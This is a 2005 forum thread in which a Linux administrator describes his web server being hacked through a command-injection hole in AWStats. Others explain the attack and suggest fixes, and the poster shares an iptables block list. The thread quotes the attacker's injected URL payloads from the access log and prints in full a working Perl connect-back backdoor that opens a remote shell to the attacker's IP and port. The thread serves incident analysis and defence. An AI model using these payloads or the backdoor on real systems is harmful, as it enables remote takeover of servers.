HPE Community
Operating System - Linux
1822158 Members
3521 Online
109640 Solutions
New Discussion юеВ

Webserver hacked via a perl script

 
SOLVED
Go to solution
Geoff Wild
Honored Contributor

тАО04-19-2005 03:16 AM

тАО04-19-2005 03:16 AM

Webserver hacked via a perl script

And I thought I had my Linux server locked down really hard.

Anyways - to the point...

I use a program called awstats to produce web/email stats for my server. It is a perl script - in it's own directory. What the script kiddie did:

grep 200.164.155.211 access_log.1
200.164.155.211 - - [16/Apr/2005:20:03:19 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 200 502
200.164.155.211 - - [16/Apr/2005:20:04:00 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20uname%20-a;%20id;%20pwd%20;echo%20__fim__;echo%20| HTTP/1.1" 200 676
200.164.155.211 - - [16/Apr/2005:20:05:59 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20%20(echo%20quote%20user%20digital00;%20%20echo%20quote%20pass%20crack80;%20echo%20bin;%20%20echo%20get%20dc.pl;%20echo%20bye)%20|%20ftp%20-n%20ftp.hpg.com.br%20;echo%20__fim__;echo%20| HTTP/1.1" 200 615
200.164.155.211 - - [16/Apr/2005:20:06:32 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20;echo%20__fim__;echo%20| HTTP/1.1" 200 571
200.164.155.211 - - [16/Apr/2005:20:06:57 -0700] "GET / HTTP/1.1" 200 10623
200.164.155.211 - - [16/Apr/2005:20:07:00 -0700] "GET /templates/met/css/template_css.css HTTP/1.1" 200 7296
200.164.155.211 - - [16/Apr/2005:20:07:03 -0700] "GET /editor/htmlarea2/editor.js HTTP/1.1" 200 46954
200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_back.png HTTP/1.1" 200 287
200.164.155.211 - - [16/Apr/2005:20:07:12 -0700] "GET /templates/met/images/mt_menu_back.jpg HTTP/1.1" 200 9080
200.164.155.211 - - [16/Apr/2005:20:07:15 -0700] "GET /templates/met/images/arrow.png HTTP/1.1" 200 169
200.164.155.211 - - [16/Apr/2005:20:07:17 -0700] "GET /templates/met/images/met_bottom.png HTTP/1.1" 200 7146
200.164.155.211 - - [16/Apr/2005:20:07:11 -0700] "GET /templates/met/images/met_top.png HTTP/1.1" 200 35754
200.164.155.211 - - [16/Apr/2005:20:07:39 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637
200.164.155.211 - - [16/Apr/2005:20:09:06 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20__comeco__;%20cd%20/tmp%20;%20%20perl%20dc.pl%20200.164.155.211%20666%20;echo%20__fim__;echo%20| HTTP/1.1" 200 637
200.164.155.211 - - [16/Apr/2005:20:10:11 -0700] "GET / HTTP/1.1" 200 2
200.164.155.211 - - [16/Apr/2005:20:11:13 -0700] "GET / HTTP/1.1" 200 50

Interesting - lucky for me - I was on the server when this was happening - and noticed perl running as apache taking up 95% cpu...

Killed it then discovered my main web page had the following message:

core-project owned you.. help? gridrunk@gmail.com

I deleted /tmp/dc.pl as well as add htaccess to the awststs bin directory...

I also ran a chkrootkit - to make sure nothing else was changed..

Can someone explain exactly what this script does:

more /tmp/dc.pl
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";

Looks like it creates a root bash session on port 80!

Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
0 Kudos
12 REPLIES 12
RAC_1
Honored Contributor

тАО04-19-2005 04:06 AM

тАО04-19-2005 04:06 AM

Re: Webserver hacked via a perl script

With my limited knowledge, it looks like it opens a TCP session on port 80 and runs bah shell. Would be good if you put this in sysadmin and wait for pricura's reply.
There is no substitute to HARDWORK
0 Kudos
Geoff Wild
Honored Contributor

тАО04-19-2005 04:58 AM

тАО04-19-2005 04:58 AM

Re: Webserver hacked via a perl script

Anil - post to sysadmin? which sysadmin?

Thanks...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
0 Kudos
RAC_1
Honored Contributor

тАО04-19-2005 05:28 AM

тАО04-19-2005 05:28 AM

Re: Webserver hacked via a perl script

I mean post on hp-ux sysadmin section or may be under language 7 script section.
There is no substitute to HARDWORK
0 Kudos
Dave Falloon
Trusted Contributor

тАО04-19-2005 08:27 AM

тАО04-19-2005 08:27 AM

Solution

Re: Webserver hacked via a perl script

This is what happened, you run a version of awstats.pl that does not check the input of configdir, the kid tested first to see what output was given "uname -a", probably saw that the kernel root privilege escalation exploit existed ( ie. < kernel 2.4.24 I think fixed that bug ), and then proceeded to get awstats to download data chaos's back door shell spawning perl script which opens a connection back to the attack on whatever port they choose.

Port 20666

this is the command that was run from awstats.pl

perl dc.pl 200.164.155.211 20666

Which means that the shell would have been run as apache or httpd user depending on your distro. If you have the kernel bug its just a matter of running the privilege exploit to turn an httpd shell into a root shell.

To find out who owns that IP we turn to our global IP registry, in this case the IP is a LACNIC address, so on their whois page ( lacnic.net ) we run a check on that IP and it turns out to be a brazilian IP address ( surprise surprise ). Give their NOC a call, and you'll figure out why brazil has so many hackers.

I hope that sheds a little light on the problem. Also look for an update to awstats.pl secunia has the details of the exploit, apparently the privilege escalation is due to awstats, not the kernel, but you should check your kernel version as well.

http://secunia.com/advisories/14299/

--Dave
Clothes make the man, Naked people have little to no effect on society
0 Kudos
W Sanders_1
Frequent Advisor

тАО04-19-2005 08:50 AM

тАО04-19-2005 08:50 AM

Re: Webserver hacked via a perl script

You know about "perl -wT", tainting, and all that? "-T" will make sure that input to a perl script is sanitized for your protection. The hoops you have to go through to make untainted copies of the user data are a big help in preventing "bad" (malicious and otherwise) data in GETs and POSTs form causing problems.

The script would not fork a root shell unless you were running Apache as root, unless it takes advantage of an Apache bug (I don't know those off the top of my head.) But then you must assume any malicious non-root user on your system can get root by whatever other means. Or at least put a non-root back door in your system as this guy did.
"There is no truth to the rumor that all employees are going to be required to have lobotomies ... at least at the prices we were quoted" -Dilbert
0 Kudos
Huc_1
Honored Contributor

тАО04-19-2005 09:10 AM

тАО04-19-2005 09:10 AM

Re: Webserver hacked via a perl script

Found some more info here

http://blogs.ittoolbox.com/security/investigator/archives/003227.asp
http://www.hostpc.com/forums/lofiversion/index.php/t1909.html

Just go to show how prudent one has to be theses days...

J-P Huc
Smile I will feel the difference
0 Kudos
W Sanders_1
Frequent Advisor

тАО04-19-2005 09:58 AM

тАО04-19-2005 09:58 AM

Re: Webserver hacked via a perl script

From awstats home page:

"Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user "nobody"). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole."
"There is no truth to the rumor that all employees are going to be required to have lobotomies ... at least at the prices we were quoted" -Dilbert
0 Kudos
Dave Falloon
Trusted Contributor

тАО04-19-2005 10:02 AM

тАО04-19-2005 10:02 AM

Re: Webserver hacked via a perl script

The security report for awstats says there is a privilege escalation exploit, but I don't know if it escalates to root permission.

The guy left all his login information for his script repository, if you are in the US just fire off an email to the authorities and they'll take care of the rest.

--Dave
Clothes make the man, Naked people have little to no effect on society
0 Kudos
Steven E. Protter
Exalted Contributor

тАО04-19-2005 04:28 PM

тАО04-19-2005 04:28 PM

Re: Webserver hacked via a perl script

Seems that this exploit gives the user the ability to do anything they want on the server, set up users, back doors, the works.

If you don't have tripwire on this system, you might want to get tripwire on it and check all the binaries.

SEP
Steven E Protter
Owner of ISN Corporation
http://isnamerica.com
http://hpuxconsulting.com
Sponsor: http://hpux.ws
Twitter: http://twitter.com/hpuxlinux
Founder http://newdatacloud.com
0 Kudos
Huc_1
Honored Contributor

тАО04-19-2005 10:51 PM

тАО04-19-2005 10:51 PM

Re: Webserver hacked via a perl script

Yes making sure of all your files would be a must.

If you can not start from scratch ! one way to do this, if you can get hold of the hardware is to restore from a full backup on an other system run tripewire on that.

Install tripewire on live system, run it and compare results, analyze differences.

This still would involve checking many, many files (even more so if backup is old) and trying to remember what has been happening since last backup !

In parallel setup networking monitoring tools and analyze traffic! watch activity, a long process!

perhaps scratch and reinstall/restore is easy and cheapest way out.

J-P Huc
Smile I will feel the difference
0 Kudos
Geoff Wild
Honored Contributor

тАО04-20-2005 01:03 AM

тАО04-20-2005 01:03 AM

Re: Webserver hacked via a perl script

Thanks for all the input - I hope this helps others as well.

Just so you know - everything on my system was up2date - only awstats was at 6.0 :(

My log dir on the web page was htaccessed - it was only the awstats bin that wasn't :(

I have upgraded awstats as well as no longer running it as root...

I think I was "lucky" that I was on my server when it happened - before any real damage was done...

I also run iptables - here a list of ip address ranges I block so far:

# class A xxx.0.0.0/8 255.0.0.0
# class B xxx.xxx.0.0/16 255.255.0.0
# class C xxx.xxx.xxx.0/24 255.255.255.0
# 128 subnet xxx.xxx.xxx.xxx/25 255.255.255.128
# 64 subnet xxx.xxx.xxx.xxx/26 255.255.255.192
# 32 subnet xxx.xxx.xxx.xxx/27 255.255.255.224
# 16 subnet xxx.xxx.xxx.xxx/28 255.255.255.240
# 8 subnet xxx.xxx.xxx.xxx/29 255.255.255.248
# 4 subnet xxx.xxx.xxx.xxx/30 255.255.255.252
# 2 subnet xxx.xxx.xxx.xxx/31 255.255.255.254
# single address xxx.xxx.xxx.xxx/32 255.255.255.255
# Drop everyting from the following ip's
echo "Process the bad people ..."
$IPT -A INPUT -p ALL -s 65.182.142.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.122.142.182 -j DROP
$IPT -A INPUT -p ALL -s 68.144.185.86 -j DROP
$IPT -A INPUT -p ALL -s 68.157.86.130 -j DROP
$IPT -A INPUT -p ALL -s 216.185.55.67 -j DROP
$IPT -A INPUT -p ALL -s 68.210.138.17 -j DROP
$IPT -A INPUT -p ALL -s 62.81.176.46 -j DROP
$IPT -A INPUT -p ALL -s 70.68.37.85 -j DROP
$IPT -A INPUT -p ALL -s 80.146.162.66 -j DROP
$IPT -A INPUT -p ALL -s 194.67.35.196 -j DROP
$IPT -A INPUT -p ALL -s 221.142.197.203 -j DROP
$IPT -A INPUT -p ALL -s 207.250.236.66 -j DROP
$IPT -A INPUT -p ALL -s 220.120.103.188 -j DROP
$IPT -A INPUT -p ALL -s 203.177.41.194 -j DROP
$IPT -A INPUT -p ALL -s 212.152.182.90 -j DROP
$IPT -A INPUT -p ALL -s 219.239.35.210 -j DROP
$IPT -A INPUT -p ALL -s 68.47.18.119 -j DROP
$IPT -A INPUT -p ALL -s 82.64.199.143 -j DROP
$IPT -A INPUT -p ALL -s 81.157.49.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.104.70.0/24 -j DROP
$IPT -A INPUT -p ALL -s 216.54.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.115.71.0/24 -j DROP
$IPT -A INPUT -p ALL -s 219.238.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 219.139.235.0/24 -j DROP
$IPT -A INPUT -p ALL -s 12.219.16.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.9.205.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.10.212.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.10.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.11.170.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.11.94.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.14.31.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.17.245.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.17.252.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.18.150.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.85.56.0/24 -j DROP
$IPT -A INPUT -p ALL -s 24.190.183.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.84.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.121.213.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.152.79.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.218.8.0/24 -j DROP
$IPT -A INPUT -p ALL -s 61.222.3.0/24 -j DROP
$IPT -A INPUT -p ALL -s 62.8.219.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.108.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 64.218.222.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.131.24.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.232.147.0/24 -j DROP
$IPT -A INPUT -p ALL -s 66.246.220.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.126.223.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.161.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.162.171.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.165.189.0/24 -j DROP
$IPT -A INPUT -p ALL -s 67.173.10.0/24 -j DROP
$IPT -A INPUT -p ALL -s 68.117.2.0/24 -j DROP
$IPT -A INPUT -p ALL -s 80.162.163.0/24 -j DROP
$IPT -A INPUT -p ALL -s 81.95.106.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.66.224.0/24 -j DROP
$IPT -A INPUT -p ALL -s 82.189.178.0/24 -j DROP
$IPT -A INPUT -p ALL -s 83.98.167.0/24 -j DROP
$IPT -A INPUT -p ALL -s 193.109.140.0/24 -j DROP
$IPT -A INPUT -p ALL -s 140.135.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.164.155.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.166.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.226.240.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.188.92.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.108.103.0/24 -j DROP
$IPT -A INPUT -p ALL -s 202.202.112.0/24 -j DROP
$IPT -A INPUT -p ALL -s 200.207.151.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.68.137.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.123.36.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.228.120.0/24 -j DROP
$IPT -A INPUT -p ALL -s 207.234.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 209.197.234.0/24 -j DROP
$IPT -A INPUT -p ALL -s 210.159.198.0/24 -j DROP
$IPT -A INPUT -p ALL -s 220.191.127.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.57.214.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.58.254.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.90.202.0/24 -j DROP
$IPT -A INPUT -p ALL -s 211.176.33.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.25.181.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.93.124.0/24 -j DROP
$IPT -A INPUT -p ALL -s 213.193.221.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.58.199.0/24 -j DROP
$IPT -A INPUT -p ALL -s 217.219.29.0/24 -j DROP
$IPT -A INPUT -p ALL -s 218.57.129.0/24 -j DROP
$IPT -A INPUT -p ALL -s 218.153.147.0/24 -j DROP
$IPT -A INPUT -p ALL -s 220.117.203.0/24 -j DROP
$IPT -A INPUT -p ALL -s 221.165.68.0/24 -j DROP
$IPT -A INPUT -p ALL -s 221.186.133.0/24 -j DROP
$IPT -A INPUT -p ALL -s 222.88.77.0/24 -j DROP
$IPT -A INPUT -p ALL -s 203.129.193.189 -j DROP
$IPT -A INPUT -p ALL -s 4.0.0.0/8 -j DROP
$IPT -A INPUT -p ALL -s 203.234.248/24 -j DROP
$IPT -A INPUT -p ALL -s 24.82.81.169 -j DROP


Rgds...Geoff
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
0 Kudos
Geoff Wild
Honored Contributor

тАО04-20-2005 01:05 AM

тАО04-20-2005 01:05 AM

Re: Webserver hacked via a perl script

Closing.
Proverbs 3:5,6 Trust in the Lord with all your heart and lean not on your own understanding; in all your ways acknowledge him, and he will make all your paths straight.
0 Kudos
The opinions expressed above are the personal opinions of the authors, not of Hewlett Packard Enterprise. By using this site, you accept the Terms of Use and Rules of Participation.